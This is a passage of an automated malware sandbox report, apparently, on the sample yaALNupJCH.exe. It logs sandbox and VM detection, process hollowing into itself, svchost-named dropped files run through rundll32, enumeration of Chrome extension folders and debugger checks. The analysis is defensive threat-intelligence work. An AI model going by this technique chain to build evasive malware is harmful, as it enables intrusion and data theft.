                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle,2_2_0041A696
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeThread delayed: delay time: 180000Jump to behavior
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeThread delayed: delay time: 180000Jump to behavior
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeWindow / User API: threadDelayed 3362Jump to behavior
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeWindow / User API: threadDelayed 5848Jump to behavior
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeWindow / User API: threadDelayed 1403Jump to behavior
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeWindow / User API: threadDelayed 8588Jump to behavior
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeAPI coverage: 8.7 %
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\svchost[1].exeJump to dropped file
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\WJ8I2OL4\svchost[1].dllJump to dropped file
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\MEEXW4H4\host[1].exeJump to dropped file
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeRegistry key enumerated: More than 150 enums for key HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeThread delayed: delay time: 30000Jump to behavior
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeThread delayed: delay time: 180000Jump to behavior
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeThread delayed: delay time: 180000Jump to behavior
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeThread delayed: delay time: 30000Jump to behavior
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_00407C97 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW,2_2_00407C97
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeAPI call chain: ExitProcess graph end nodegraph_2-66684
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeAPI call chain: ExitProcess graph end nodegraph_3-69779
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeAPI call chain: ExitProcess graph end nodegraph_3-69850
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images\Jump to behavior
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html\Jump to behavior
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\bg\Jump to behavior
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css\Jump to behavior
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales\Jump to behavior
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\Jump to behavior
                                Source: Amcache.hve.6.drBinary or memory string: VMware
                                Source: Amcache.hve.6.drBinary or memory string: scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
                                Source: Amcache.hve.6.drBinary or memory string: @scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
                                Source: Amcache.hve.6.drBinary or memory string: VMware Virtual USB Mouse
                                Source: Amcache.hve.6.drBinary or memory string: VMware, Inc.
                                Source: yaALNupJCH.exe, 00000002.00000002.1399184360.0000000000DC7000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW`Y
                                Source: Amcache.hve.6.drBinary or memory string: VMware Virtual disk SCSI Disk Devicehbin
                                Source: Amcache.hve.6.drBinary or memory string: Microsoft Hyper-V Generation Counter
                                Source: Amcache.hve.6.drBinary or memory string: VMware7,1
                                Source: Amcache.hve.6.drBinary or memory string: NECVMWar VMware SATA CD00
                                Source: Amcache.hve.6.drBinary or memory string: VMware Virtual disk SCSI Disk Device
                                Source: yaALNupJCH.exe, 00000000.00000003.1025833709.000000000152E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1302644289.000000000152E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1377024727.000000000152E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000002.1399167458.000000000152E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.1315748710.000000000152E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000000.00000003.887098483.000000000152E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000002.00000003.885731631.0000000000E2E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000002.00000003.885713601.0000000000E2E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000002.00000002.1399184360.0000000000E2E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000003.00000002.907353179.000000000112D000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
                                Source: Amcache.hve.6.drBinary or memory string: scsi\cdromnecvmwarvmware_sata_cd001.00,scsi\cdromnecvmwarvmware_sata_cd00,scsi\cdromnecvmwar,scsi\necvmwarvmware_sata_cd001,necvmwarvmware_sata_cd001,gencdrom
                                Source: Amcache.hve.6.drBinary or memory string: scsi\diskvmware__virtual_disk____2.0_,scsi\diskvmware__virtual_disk____,scsi\diskvmware__,scsi\vmware__virtual_disk____2,vmware__virtual_disk____2,gendisk
                                Source: Amcache.hve.6.drBinary or memory string: VMware, Inc.me
                                Source: Amcache.hve.6.drBinary or memory string: VMware-42 35 d8 20 48 cb c7 ff-aa 5e d0 37 a0 49 53 d7
                                Source: Amcache.hve.6.drBinary or memory string: scsi/cdrom&ven_necvmwar&prod_vmware_sata_cd00/5&280b647&0&000000
                                Source: Amcache.hve.6.drBinary or memory string: BiosVendor:VMware, Inc.,BiosVersion:VMW71.00V.18227214.B64.2106252220,BiosReleaseDate:06/25/2021,BiosMajorRelease:0xff,BiosMinorRelease:0xff,SystemManufacturer:VMware, Inc.,SystemProduct:VMware7,1,SystemFamily:,SystemSKUNumber:,BaseboardManufacturer:,BaseboardProduct:,BaseboardVersion:,EnclosureType:0x1
                                Source: yaALNupJCH.exe, 00000002.00000003.885731631.0000000000E2E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000002.00000003.885713601.0000000000E2E000.00000004.00000020.00020000.00000000.sdmp, yaALNupJCH.exe, 00000002.00000002.1399184360.0000000000E2E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWdH
                                Source: yaALNupJCH.exe, 00000000.00000002.1399167458.00000000014CA000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWP{S
                                Source: Amcache.hve.6.drBinary or memory string: :scsi/disk&ven_vmware&prod_virtual_disk/5&1ec51bf7&0&000000
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 0_2_00CB4210 Sleep,GetVersionExW,GetModuleHandleA,GetProcAddress,GetNativeSystemInfo,GetSystemInfo,0_2_00CB4210
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 0_2_00CCBB8B FindFirstFileExW,0_2_00CCBB8B
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_0041C1DF FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,GetLastError,FindClose,RemoveDirectoryW,FindClose,2_2_0041C1DF
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_00409253 __EH_prolog,__CxxThrowException@8,FindFirstFileW,FindNextFileW,FindClose,FindClose,2_2_00409253
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_0040C29B FindFirstFileW,PathFileExistsW,FindNextFileW,FindClose,FindClose,2_2_0040C29B
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_00409665 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,2_2_00409665
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_0044E739 FindFirstFileExA,2_2_0044E739
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_0040880C __EH_prolog,FindFirstFileW,__CxxThrowException@8,FindNextFileW,FindClose,2_2_0040880C
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_0040783C FindFirstFileW,FindNextFileW,2_2_0040783C
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_00419A43 FindFirstFileW,FindNextFileW,FindNextFileW,2_2_00419A43
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_0040BA7E FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose,2_2_0040BA7E
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_0040BC85 FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose,2_2_0040BC85
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_00CCBB8B FindFirstFileExW,2_2_00CCBB8B
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_0040F19B _memset,lstrcat,wsprintfA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,3_2_0040F19B
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_00413234 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,lstrcat,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,_memset,_memset,_memset,_memset,_memset,_memset,FindNextFileA,FindClose,_memset,lstrcat,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,_memset,_memset,_memset,_memset,_memset,_memset,3_2_00413234
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_0040F465 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,3_2_0040F465
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_0040F6AB wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,StrCmpCA,wsprintfA,PathMatchSpecA,_memset,lstrcat,lstrcat,CopyFileA,DeleteFileA,_memset,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,3_2_0040F6AB
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_0041D9AB __EH_prolog3_GS,FindFirstFileW,FindNextFileW,FindNextFileW,3_2_0041D9AB
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_00416BAA wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,_memset,wsprintfA,_memset,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,_memset,_memset,FindNextFileA,FindClose,3_2_00416BAA
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_00412CAC wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,_memset,lstrcat,lstrcat,lstrcat,lstrcat,_memset,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,3_2_00412CAC
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_0040AFE9 wsprintfA,FindFirstFileA,_memset,lstrcat,StrCmpCA,StrCmpCA,lstrcpy,lstrcat,lstrcat,_memset,_memset,StrCmpCA,wsprintfA,wsprintfA,lstrlenA,_strtok_s,PathMatchSpecA,CoInitialize,_strtok_s,PathMatchSpecA,lstrcpy,lstrcat,PathFindFileNameA,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,PathMatchSpecA,PathMatchSpecA,CoInitialize,PathMatchSpecA,PathMatchSpecA,lstrcpy,lstrcat,lstrcat,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,FindNextFileA,FindClose,3_2_0040AFE9
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_0040A6DC __EH_prolog3_GS,GetProcessHeap,HeapAlloc,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,_memset,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,_memset,lstrcat,lstrlenA,_MSFOpenExW,_memset,3_2_0040A6DC
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_00409810 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,3_2_00409810
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_00412AC1 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,3_2_00412AC1
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_00412EF7 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,_memset,_memset,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,_memset,lstrcat,lstrcat,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,StrCmpCA,StrCmpCA,DeleteFileA,FindNextFileA,FindClose,3_2_00412EF7
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_0041CA9E LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,2_2_0041CA9E
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 0_2_00CC4AB1 mov eax, dword ptr fs:[00000030h]0_2_00CC4AB1
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 0_2_00CC82B2 mov eax, dword ptr fs:[00000030h]0_2_00CC82B2
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_00443214 mov eax, dword ptr fs:[00000030h]2_2_00443214
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_00CC82B2 mov eax, dword ptr fs:[00000030h]2_2_00CC82B2
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_00CC4AB1 mov eax, dword ptr fs:[00000030h]2_2_00CC4AB1
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 0_2_00CC2B00 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00CC2B00
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 0_2_00CCCDE1 GetProcessHeap,0_2_00CCCDE1
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 0_2_00CC2C65 SetUnhandledExceptionFilter,0_2_00CC2C65
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 0_2_00CC309D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00CC309D
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 0_2_00CC2B00 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00CC2B00
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 0_2_00CC6E28 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00CC6E28
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_00434A95 SetUnhandledExceptionFilter,2_2_00434A95
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_00434947 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00434947
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_0043BA62 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_0043BA62
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_00434F3C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00434F3C
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_00CC309D SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,2_2_00CC309D
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_00CC2B00 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00CC2B00
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_00CC2C65 SetUnhandledExceptionFilter,2_2_00CC2C65
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_00CC6E28 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,2_2_00CC6E28
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_0042305A IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,3_2_0042305A
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_0042A161 _memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,3_2_0042A161
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_0042ECD7 SetUnhandledExceptionFilter,3_2_0042ECD7
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 3_2_61EAF900 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,abort,3_2_61EAF900

                                HIPS / PFW / Operating System Protection Evasion

                                barindex
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeMemory written: C:\Users\user\Desktop\yaALNupJCH.exe base: 400000 value starts with: 4D5AJump to behavior
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeMemory written: C:\Users\user\Desktop\yaALNupJCH.exe base: 400000 value starts with: 4D5AJump to behavior
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 0_2_00CB34C0 GetModuleFileNameA,CreateProcessA,VirtualAlloc,GetThreadContext,ReadProcessMemory,GetModuleHandleA,GetProcAddress,VirtualAllocEx,WriteProcessMemory,WriteProcessMemory,WriteProcessMemory,SetThreadContext,ResumeThread,VirtualFree,0_2_00CB34C0
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe2_2_00412045
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeProcess created: C:\Windows\SysWOW64\rundll32.exe "C:\Windows\System32\rundll32.exe" C:\Users\user\AppData\Local\Temp\1000026011\svchost.dll, STDAPI Start(void)Jump to behavior
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeProcess created: C:\Users\user\Desktop\yaALNupJCH.exe C:\Users\user\Desktop\yaALNupJCH.exeJump to behavior
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeProcess created: C:\Users\user\Desktop\yaALNupJCH.exe C:\Users\user\Desktop\yaALNupJCH.exeJump to behavior
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 0_2_00CB3680 ShellExecuteA,Sleep,Sleep,CreateThread,Sleep,Sleep,0_2_00CB3680
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: 2_2_00419575 mouse_event,2_2_00419575
                                Source: yaALNupJCH.exe, 00000002.00000002.1399184360.0000000000DFC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager
                                Source: yaALNupJCH.exe, 00000002.00000002.1399184360.0000000000DFC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Program Manager_
                                Source: yaALNupJCH.exe, 00000002.00000002.1399184360.0000000000DFC000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: |Program Manager|
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: GetLocaleInfoA,2_2_0040F81F
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,2_2_00452004
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: GetLocaleInfoW,2_2_00452254
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: EnumSystemLocalesW,2_2_004482C4
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,2_2_0045237D
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: GetLocaleInfoW,2_2_00452484
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,2_2_00452551
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: GetLocaleInfoW,2_2_004487AD
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,2_2_00451C19
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: EnumSystemLocalesW,2_2_00451EDC
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: EnumSystemLocalesW,2_2_00451E91
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: EnumSystemLocalesW,2_2_00451F77
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: GetProcessHeap,HeapAlloc,GetKeyboardLayoutList,LocalAlloc,GetKeyboardLayoutList,GetLocaleInfoA,wsprintfA,wsprintfA,_memset,LocalFree,3_2_00419AB2
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: __getptd,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_TranslateName,_GetLcidFromLangCountry,_GetLcidFromLanguage,_strlen,EnumSystemLocalesA,GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoA,_strcpy_s,__invoke_watson,GetLocaleInfoA,GetLocaleInfoA,__itow_s,3_2_0043105A
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: _strlen,_GetPrimaryLen,EnumSystemLocalesA,3_2_0043101E
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_num,InterlockedDecrement,InterlockedDecrement,InterlockedDecrement,_free,_free,3_2_00430357
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: ___crtGetLocaleInfoA,GetLastError,___crtGetLocaleInfoA,__calloc_crt,___crtGetLocaleInfoA,__calloc_crt,_free,_free,__invoke_watson,GetLocaleInfoW,GetLocaleInfoW,__calloc_crt,GetLocaleInfoW,_free,GetLocaleInfoW,3_2_0042F493
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: ___getlocaleinfo,__malloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,__calloc_crt,GetCPInfo,___crtGetStringTypeA,___crtLCMapStringA,___crtLCMapStringA,_memmove,_memmove,_memmove,InterlockedDecrement,_free,_free,_free,_free,_free,_free,_free,_free,_free,InterlockedDecrement,3_2_004275BA
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: __calloc_crt,__malloc_crt,_free,__malloc_crt,_free,_free,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___free_lconv_mon,_free,_free,_free,InterlockedDecrement,InterlockedDecrement,_free,_free,3_2_00430645
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: ___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,___getlocaleinfo,3_2_0042F6FB
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: GetLocaleInfoA,3_2_004297DD
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: GetLocaleInfoW,GetLocaleInfoW,_malloc,GetLocaleInfoW,WideCharToMultiByte,__freea,3_2_00433942
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: _LocaleUpdate::_LocaleUpdate,__crtGetLocaleInfoA_stat,3_2_00433A1C
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: GetLocaleInfoW,GetLocaleInfoW,GetACP,3_2_00430B2C
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,3_2_00430C21
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: GetLocaleInfoW,_GetPrimaryLen,_strlen,3_2_00430CC8
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,GetLocaleInfoA,GetLocaleInfoA,_strlen,GetLocaleInfoA,_strlen,_TestDefaultLanguage,3_2_00430D23
                                Source: C:\Users\user\Desktop\yaALNupJCH.exeCode function: __getptd,_LcidFromHexString,GetLocaleInfoA,_TestDefaultLanguage,3_2_00430EF4
